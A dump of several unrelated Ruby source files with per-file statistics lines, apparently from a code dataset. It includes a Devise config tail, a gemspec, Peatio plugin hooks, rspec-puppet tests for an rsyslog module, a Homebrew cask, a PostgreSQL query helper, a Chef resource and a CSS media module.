# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
# ==> Turbolinks configuration
# If your app is using Turbolinks, Turbolinks::Controller needs to be included to make redirection work correctly:
#
# ActiveSupport.on_load(:devise_failure_app) do
# include Turbolinks::Controller
# end
# ==> Configuration for :registerable
# When set to false, does not sign a user in automatically after their password is
# changed. Defaults to true, so a user is signed in automatically after changing a password.
# config.sign_in_after_change_password = true
end
| 48.19 | 154 | 0.751262 |
b92395c6bc35fee44ee2864ef5ec0ca0373c6060 | 861 | # frozen_string_literal: true
$LOAD_PATH.push File.expand_path('lib', __dir__)
# Maintain your gem's version:
require 'active_storage_validations/version'
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = 'active_storage_validations'
s.version = ActiveStorageValidations::VERSION
s.authors = ['Igor Kasyanchuk']
s.email = ['[email protected]']
s.homepage = 'https://github.com/igorkasyanchuk'
s.summary = 'Validations for Active Storage'
s.description = 'Validations for Active Storage (presence)'
s.license = 'MIT'
s.files = Dir['{app,config,db,lib}/**/*', 'MIT-LICENSE', 'Rakefile', 'README.md']
s.add_dependency 'rails', '>= 5.2.0'
s.add_development_dependency 'pry'
s.add_development_dependency 'rubocop'
s.add_development_dependency 'sqlite3'
end
| 33.115385 | 83 | 0.70964 |
e2f25c02d256bc06255bf0be2b13a7c55635f4ba | 1,585 | module Peatio
module Paycentralservice
module Hooks
BLOCKCHAIN_VERSION_REQUIREMENT = "~> 1.0.0"
WALLET_VERSION_REQUIREMENT = "~> 1.0.0"
class << self
def check_compatibility
unless Gem::Requirement.new(BLOCKCHAIN_VERSION_REQUIREMENT)
.satisfied_by?(Gem::Version.new(Peatio::Blockchain::VERSION))
[
"Paycentralservice blockchain version requiremnt was not suttisfied by Peatio::Blockchain.",
"Paycentralservice blockchain requires #{BLOCKCHAIN_VERSION_REQUIREMENT}.",
"Peatio::Blockchain version is #{Peatio::Blockchain::VERSION}"
].join('\n').tap { |s| Kernel.abort s }
end
unless Gem::Requirement.new(WALLET_VERSION_REQUIREMENT)
.satisfied_by?(Gem::Version.new(Peatio::Wallet::VERSION))
[
"Paycentralservice wallet version requiremnt was not suttisfied by Peatio::Wallet.",
"Paycentralservice wallet requires #{WALLET_VERSION_REQUIREMENT}.",
"Peatio::Wallet version is #{Peatio::Wallet::VERSION}"
].join('\n').tap { |s| Kernel.abort s }
end
end
def register
Peatio::Blockchain.registry[:pcs] = Paycentralservice::Blockchain
Peatio::Wallet.registry[:pcsd] = Paycentralservice::Wallet
end
end
if defined?(Rails::Railtie)
require "peatio/paycentralservice/railtie"
else
check_compatibility
register
end
end
end
end
| 36.860465 | 106 | 0.606309 |
087883320805aca5867ae0ad51ae7d0c9a12a62a | 30,086 | require 'spec_helper'
describe 'rsyslog' do
describe 'rsyslog_config' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
:domain => 'defaultdomain',
}
end
context 'attributes' do
context 'with default params' do
it {
should contain_file('rsyslog_config').with({
'path' => '/etc/rsyslog.conf',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
'notify' => 'Service[rsyslog_daemon]',
})
}
end
end
context 'rsyslog config content' do
context 'with default params' do
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$template RemoteHost, "\/srv\/logs\/%HOSTNAME%\/%\$YEAR%-%\$MONTH%-%\$DAY%.log"$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\*.\* @@log.defaultdomain:514/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$RuleSet remote\n\*.\*?RemoteHost$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$InputTCPServerBindRuleset remote$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$InputTCPServerRun 514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$InputUDPServerBindRuleset remote$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$UDPServerRun 514$/) }
end
context 'with is_log_server=true' do
let :params do
{ :is_log_server => 'true' }
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should contain_file('rsyslog_config').with_content(/^\$template RemoteHost, "\/srv\/logs\/%HOSTNAME%\/%\$YEAR%-%\$MONTH%-%\$DAY%.log"$/) }
it { should contain_file('rsyslog_config').with_content(/^\$RuleSet remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* \?RemoteHost$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerBindRuleset remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerRun 514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\*.\* @@log.defaultdomain:514/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$InputUDPServerBindRuleset remote$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$UDPServerRun 514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
end
context 'with is_log_server enabled and transport_protocol=tcp specified' do
let :params do
{
:is_log_server => 'true',
:transport_protocol => 'tcp',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$template RemoteHost, "\/srv\/logs\/%HOSTNAME%\/%\$YEAR%-%\$MONTH%-%\$DAY%.log"$/) }
it { should contain_file('rsyslog_config').with_content(/^\$RuleSet remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* \?RemoteHost$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerBindRuleset remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerRun 514$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
end
context 'with is_log_server enabled and transport_protocol=udp specified' do
let :params do
{
:is_log_server => 'true',
:transport_protocol => 'udp',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$template RemoteHost, "\/srv\/logs\/%HOSTNAME%\/%\$YEAR%-%\$MONTH%-%\$DAY%.log"$/) }
it { should contain_file('rsyslog_config').with_content(/^\$RuleSet remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* \?RemoteHost$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputUDPServerBindRuleset remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\$UDPServerRun 514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
end
context 'with is_log_server enabled and enable_tcp_server enabled and enable_udp_server enabled' do
let :params do
{
:is_log_server => 'true',
:enable_tcp_server => 'true',
:enable_udp_server => 'true',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$template RemoteHost, "\/srv\/logs\/%HOSTNAME%\/%\$YEAR%-%\$MONTH%-%\$DAY%.log"$/) }
it { should contain_file('rsyslog_config').with_content(/^\$RuleSet remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* \?RemoteHost$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerBindRuleset remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerRun 514$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputUDPServerBindRuleset remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\$UDPServerRun 514$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
end
context 'with remote_logging enabled' do
let :params do
{ :remote_logging => 'true' }
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* @@log.defaultdomain:514/) }
end
context 'with remote_logging enabled and source_facilities specified' do
let :params do
{
:remote_logging => 'true',
:source_facilities => '*.*;user.none',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\*;user.none @@log.defaultdomain:514/) }
end
context 'with remote_logging enabled and transport_protocol=tcp specified' do
let :params do
{
:remote_logging => 'true',
:transport_protocol => 'tcp',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* @@log.defaultdomain:514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
end
context 'with remote_logging enabled and transport_protocol=udp specified' do
let :params do
{
:remote_logging => 'true',
:transport_protocol => 'udp',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* @log.defaultdomain:514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
end
context 'with source_facilities set to an empty string' do
let :params do
{ :source_facilities => '' }
end
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog::source_facilities cannot be empty!/)
end
end
context 'with log_dir and remote_template set' do
let :params do
{
:is_log_server => 'true',
:log_dir => '/foo/bar',
:remote_template => '%HOSTNAME%.log',
}
end
it {
should contain_file('rsyslog_config') \
.with_content(/^\$template RemoteHost, "\/foo\/bar\/%HOSTNAME%.log"$/)
}
end
end
end
describe 'rsyslog_package' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'with default params' do
it {
should contain_package('rsyslog').with({
'ensure' => 'present'
})
}
end
context 'specified as an array' do
let(:params) { { :package => ['rsyslog', 'andfriends'] } }
it {
should contain_package('rsyslog').with({
'ensure' => 'present'
})
}
it {
should contain_package('andfriends').with({
'ensure' => 'present'
})
}
end
context 'with package_ensure=absent' do
let (:params) { { :package_ensure => 'absent' } }
it {
should contain_package('rsyslog').with({
'ensure' => 'absent',
})
}
end
end
describe 'rsyslog_daemon' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'with default params' do
it { should contain_service('rsyslog_daemon').with( { 'name' => 'rsyslog' } ) }
end
context 'with daemon_ensure=stopped' do
let (:params) { { :daemon_ensure => 'stopped' } }
it {
should contain_service('rsyslog_daemon').with({
'name' => 'rsyslog',
'ensure' => 'stopped',
})
}
end
end
logrotate_hash = {
'el5' => { :osfamily => 'RedHat', :release => '5', :pid => '/var/run/rsyslogd.pid' },
'el6' => { :osfamily => 'RedHat', :release => '6', :pid => '/var/run/syslogd.pid' },
'debian7' => { :osfamily => 'Debian', :release => '7', :pid => '/var/run/rsyslogd.pid' },
'suse11' => { :osfamily => 'Suse', :release => '11', :pid => '/var/run/rsyslogd.pid' },
}
describe 'rsyslog_logrotate_d_config' do
logrotate_hash.sort.each do |k,v|
context "with default params on #{v[:osfamily]} #{v[:release]}" do
let :facts do
{
:osfamily => v[:osfamily],
:lsbmajdistrelease => v[:release],
}
end
it {
should contain_file('rsyslog_logrotate_d_config').with({
'path' => '/etc/logrotate.d/syslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
})
}
it { should contain_file('rsyslog_logrotate_d_config').with_content(
%{# This file is being maintained by Puppet.
# DO NOT EDIT
/var/log/messages
/var/log/secure
/var/log/maillog
/var/log/spooler
/var/log/boot.log
/var/log/cron
{
sharedscripts
postrotate
/bin/kill -HUP `cat #{v[:pid]} 2> /dev/null` 2> /dev/null || true
endscript
}
})
}
end
end
end
describe 'with pid_file parameter' do
context 'specified' do
let(:params) { { :pid_file => '/path/to/syslog.pid' } }
let :facts do
{
:osfamily => 'Debian',
:lsbmajdistrelease => '7',
}
end
it {
should contain_file('rsyslog_logrotate_d_config').with({
'path' => '/etc/logrotate.d/syslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
})
}
it { should contain_file('rsyslog_logrotate_d_config').with_content(
%{# This file is being maintained by Puppet.
# DO NOT EDIT
/var/log/messages
/var/log/secure
/var/log/maillog
/var/log/spooler
/var/log/boot.log
/var/log/cron
{
sharedscripts
postrotate
/bin/kill -HUP `cat /path/to/syslog.pid 2> /dev/null` 2> /dev/null || true
endscript
}
})
}
end
context 'with pid_file specified as an invalid value' do
let(:params) { { :pid_file => 'invalid/path/to/syslog.pid' } }
let :facts do
{
:osfamily => 'Debian',
:lsbmajdistrelease => '7',
}
end
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error)
end
end
end
describe 'rsyslog_sysconfig' do
context 'on Debian' do
let :facts do
{ :osfamily => 'Debian' }
end
context 'with default params' do
it {
should contain_file('rsyslog_sysconfig').with({
'path' => '/etc/default/rsyslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
'notify' => 'Service[rsyslog_daemon]',
})
}
it { should contain_file('rsyslog_sysconfig').with_content(/^RSYSLOGD_OPTIONS="-c5"$/) }
end
end
context 'on EL 6' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'with default params' do
it {
should contain_file('rsyslog_sysconfig').with({
'path' => '/etc/sysconfig/rsyslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
'notify' => 'Service[rsyslog_daemon]',
})
}
it {
should contain_file('rsyslog_sysconfig').with_content(/^SYSLOGD_OPTIONS="-c 4"$/)
}
end
end
context 'on EL 5' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '5',
}
end
context 'with default params' do
it {
should contain_file('rsyslog_sysconfig').with({
'path' => '/etc/sysconfig/rsyslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
'notify' => 'Service[rsyslog_daemon]',
})
}
it { should contain_file('rsyslog_sysconfig').with_content(/^SYSLOGD_OPTIONS="-m 0"$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^KLOGD_OPTIONS="-x"$/) }
end
end
context 'on Suse 11' do
let :facts do
{
:osfamily => 'Suse',
:lsbmajdistrelease => '11',
}
end
context 'with default params' do
it {
should contain_file('rsyslog_sysconfig').with({
'path' => '/etc/sysconfig/syslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
'notify' => 'Service[rsyslog_daemon]',
})
}
it { should contain_file('rsyslog_sysconfig').with_content(/^KERNEL_LOGLEVEL=1$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^SYSLOGD_PARAMS=""$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^KLOGD_PARAMS="-x"$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^SYSLOG_DAEMON="rsyslogd"$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^SYSLOG_NG_PARAMS=""$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^RSYSLOGD_NATIVE_VERSION="5"$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^RSYSLOGD_COMPAT_VERSION=""$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^RSYSLOGD_PARAMS=""$/) }
end
end
end
describe 'rsyslog_d_dir' do
context "with default params" do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
it {
should contain_file('rsyslog_d_dir').with({
'ensure' => 'directory',
'path' => '/etc/rsyslog.d',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
'purge' => true,
'recurse' => true,
'require' => 'Common::Mkdir_p[/etc/rsyslog.d]',
})
}
end
context "with rsyslog_d_dir parameters specified" do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
let :params do
{ :rsyslog_d_dir => '/custom/rsyslog.d',
:rsyslog_d_dir_owner => 'other',
:rsyslog_d_dir_group => 'othergroup',
:rsyslog_d_dir_mode => '0775',
:rsyslog_d_dir_purge => false,
}
end
it {
should contain_file('rsyslog_d_dir').with({
'ensure' => 'directory',
'path' => '/custom/rsyslog.d',
'owner' => 'other',
'group' => 'othergroup',
'mode' => '0775',
'recurse' => true,
'purge' => false,
'require' => 'Common::Mkdir_p[/custom/rsyslog.d]',
})
}
end
context "with rsyslog_d_dir specified as invalid path" do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
let (:params) { { :rsyslog_d_dir => 'custom/rsyslog.d' } }
it 'should fail' do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error)
end
end
['true',true].each do |value|
context "with rsyslog_d_dir_purge specified as #{value}" do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
let (:params) { { :rsyslog_d_dir_purge => value } }
it {
should contain_file('rsyslog_d_dir').with({
'recurse' => true,
'purge' => true,
})
}
end
end
['false',false].each do |value|
context "with rsyslog_d_dir_purge specified as #{value}" do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
let (:params) { { :rsyslog_d_dir_purge => value } }
it {
should contain_file('rsyslog_d_dir').with({
'recurse' => true,
'purge' => false,
})
}
end
end
context 'with rsyslog_d_dir_purge specified as an invalid value' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
let (:params) { { :rsyslog_d_dir_purge => 'invalid' } }
it 'should fail' do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error)
end
end
end
describe 'case is_log_server, default params' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'case true' do
let(:params) { { :is_log_server => 'true' } }
it { should contain_class('common') }
it {
should contain_file('log_dir').with({
'ensure' => 'directory',
'path' => '/srv/logs',
'owner' => 'root',
'group' => 'root',
'mode' => '0750',
'require' => 'Common::Mkdir_p[/srv/logs]'
})
}
end
context 'case true, log_dir set' do
let :params do
{
:is_log_server => 'true',
:log_dir => '/foo/bar',
:log_dir_owner => 'nobody',
:log_dir_group => 'staff',
:log_dir_mode => '0755',
}
end
it {
should contain_file('log_dir').with({
'ensure' => 'directory',
'path' => '/foo/bar',
'owner' => 'nobody',
'group' => 'staff',
'mode' => '0755',
'require' => 'Common::Mkdir_p[/foo/bar]',
})
}
end
context 'case default' do
let(:params) { { :is_log_server => 'undefined' } }
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog::is_log_server is undefined and must be \'true\' or \'false\'./)
end
end
end
describe 'case transport_protocol, default params' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'with transport_protocol set to invalid value' do
let(:params) { { :transport_protocol => 'invalid' } }
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog::transport_protocol is invalid and must be \'tcp\' or \'udp\'./)
end
end
end
describe 'case remote_logging, default params' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'case true' do
let(:params) { { :remote_logging => 'true' } }
it {
should contain_file('ryslog_spool_directory').with({
'ensure' => 'directory',
'path' => '/var/spool/rsyslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0700',
'require' => 'Common::Mkdir_p[/var/spool/rsyslog]'
})
}
it {
should contain_exec('mkdir_p-/var/spool/rsyslog').with({
'command' => 'mkdir -p /var/spool/rsyslog',
'unless' => 'test -d /var/spool/rsyslog',
})
}
end
context 'case false' do
let(:params) { { :remote_logging => 'false' } }
it {
should_not contain_file('ryslog_spool_directory')
}
it {
should_not contain_exec('mkdir_p-/var/spool/rsyslog')
}
end
end
describe 'module platform support' do
context 'on supported osfamily, RedHat' do
context 'on unsupported major release 4' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '4',
}
end
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog supports RedHat like systems with major release of 5 and 6 and you have 4/)
end
end
context 'on supported major release 5' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '5',
}
end
it { should contain_class('rsyslog') }
end
context 'on supported major release 6' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
it { should contain_class('rsyslog') }
end
end
context 'on supported osfamily, Debian' do
let :facts do
{ :osfamily => 'Debian' }
end
it { should contain_class('rsyslog') }
end
context 'on supported osfamily, Suse' do
context 'on unsupported major release 10' do
let :facts do
{
:osfamily => 'Suse',
:lsbmajdistrelease => '10',
}
end
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog supports Suse like systems with major release 11, and you have 10/)
end
end
context 'on supported major release 11' do
let :facts do
{
:osfamily => 'Suse',
:lsbmajdistrelease => '11',
}
end
it { should contain_class('rsyslog') }
end
end
context 'on unsupported osfamily, Solaris' do
let(:facts) { { :osfamily => 'Solaris' } }
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog supports osfamilies RedHat, Suse and Debian. Detected osfamily is Solaris/)
end
end
end
end
| 37.281289 | 155 | 0.571262 |
f7e52d29d0b35007255508fd8dc819d378773b92 | 716 | cask "zettlr" do
arch = Hardware::CPU.intel? ? "x64" : "arm64"
version "2.1.2"
if Hardware::CPU.intel?
sha256 "c16ef93a6de8b1857704346954beb8cdfb9629e8f773dcd5588d3a67b8f32a8c"
else
sha256 "098330ea9c1848acd202c299e3b1c4f8a309745c33d34c5c1bced24f5be7f48e"
end
url "https://github.com/Zettlr/Zettlr/releases/download/v#{version}/Zettlr-#{version}-#{arch}.dmg"
name "Zettlr"
desc "Open-source markdown editor"
homepage "https://github.com/Zettlr/Zettlr/"
app "Zettlr.app"
zap trash: [
"~/Library/Application Support/zettlr",
"~/Library/Logs/Zettlr",
"~/Library/Preferences/com.zettlr.app.plist",
"~/Library/Saved Application State/com.zettlr.app.savedState",
]
end
| 27.538462 | 100 | 0.72067 |
ed10cbbd2f282500a08292934a846466bf3f4dce | 2,211 | # frozen_string_literal: true
module Torque
module PostgreSQL
class AuxiliaryStatement
class Settings < Collector.new(:attributes, :join, :join_type, :query, :requires,
:polymorphic, :through)
attr_reader :base, :source
alias_method :select, :attributes
alias_method :cte, :source
delegate :relation_query?, to: Torque::PostgreSQL::AuxiliaryStatement
delegate :table, :table_name, to: :@source
delegate :sql, to: ::Arel
def initialize(base, source)
@base = base
@source = source
end
def base_name
@base.name
end
def base_table
@base.arel_table
end
# Get the arel version of the table set on the query
def query_table
raise StandardError, 'The query is not defined yet' if query.nil?
return query.arel_table if relation_query?(query)
@query_table
end
# Grant an easy access to arel table columns
def col(name)
query_table[name.to_s]
end
alias column col
# There are two ways of setting the query:
# - A simple relation based on a Model
# - A Arel-based select manager
# - A string or a proc that requires the table name as first argument
def query(value = nil, command = nil)
return @query if value.nil?
return @query = value if relation_query?(value)
if value.is_a?(::Arel::SelectManager)
@query = value
@query_table = value.source.left.name
return
end
valid_type = command.respond_to?(:call) || command.is_a?(String)
raise ArgumentError, <<-MSG.squish if command.nil?
To use proc or string as query, you need to provide the table name
as the first argument
MSG
raise ArgumentError, <<-MSG.squish unless valid_type
Only relation, string and proc are valid object types for query,
#{command.inspect} given.
MSG
@query = command
@query_table = ::Arel::Table.new(value)
end
end
end
end
end
| 28.346154 | 87 | 0.588422 |
2142836a83133a61512208d26d89d86bf1011f37 | 1,257 | #
# Cookbook Name:: redisio
# Resource::configure
#
# Copyright 2013, Brian Bianco <[email protected]>
# Copyright 2013, Rackspace Hosting <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
actions :run
# Uncomment this and remove the block in initialize
# when ready to drop support for chef <= 0.10.8
#default_action :run
# Configuration attributes
attribute :version, kind_of: String
attribute :base_piddir, kind_of: String, default: '/var/run/redis'
attribute :user, kind_of: String, default: 'redis'
attribute :group, kind_of: String, default: 'redis'
attribute :default_settings, kind_of: Hash
attribute :servers, kind_of: Array
def initialize(name, run_context = nil)
super
@action = :run
@tarball = nil
end
| 31.425 | 74 | 0.755768 |
62b8047de8565cbf1ac998441e66a85576efcff0 | 857 | require "css_media/version"
module CssMedia
autoload :Sprockets, 'css_media/sprockets'
# Add prefixes to `css`. See `Processor#process` for options.
def self.process(css, opts = { })
params = { }
# params[:browsers] = opts.delete(:browsers) if opts.has_key?(:browsers)
Processor.new(params).process(css, opts)
end
# Add Autoprefixer for Sprockets environment in `assets`.
# You can specify `browsers` actual in your project.
def self.install(assets, opts = {})
Sprockets.register_processor(Processor.new(opts))
Sprockets.install(assets)
end
# Disable installed Autoprefixer
def self.uninstall(assets)
Sprockets.uninstall(assets)
end
end
require_relative 'css_media/result'
require_relative 'css_media/version'
require_relative 'css_media/processor'
require_relative 'css_media/railtie' if defined?(Rails)
| 27.645161 | 76 | 0.738623 |
Subsets and Splits
No community queries yet
